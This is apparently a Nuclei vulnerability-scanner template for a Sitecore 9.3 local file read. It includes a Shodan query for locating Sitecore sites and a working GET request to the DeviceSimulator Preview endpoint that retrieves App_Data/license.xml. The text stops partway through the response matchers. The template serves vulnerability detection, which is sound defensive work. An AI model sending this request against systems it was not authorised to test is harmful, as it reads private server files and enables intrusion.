id: sitecore-lfi info: name: Sitecore 9.3 - Webroot File Read author: DhiyaneshDK severity: high description: SiteCore 9.3 is vulnerable to LFI. reference: - https://blog.assetnote.io/2023/05/10/sitecore-round-two/ metadata: verified: true max-request: 1 shodan-query: title:"Sitecore" tags: sitecore,lfi,misconfig http: - method: GET path: - "{{BaseURL}}/api/sitecore/Sitecore.Mvc.DeviceSimulator.Controllers.SimulatorController,Sitecore.Mvc.DeviceSimulator.dll/Preview?previewPath=/App_Data/license.xml" matchers-condition: and matchers: - type: word part: body words: - "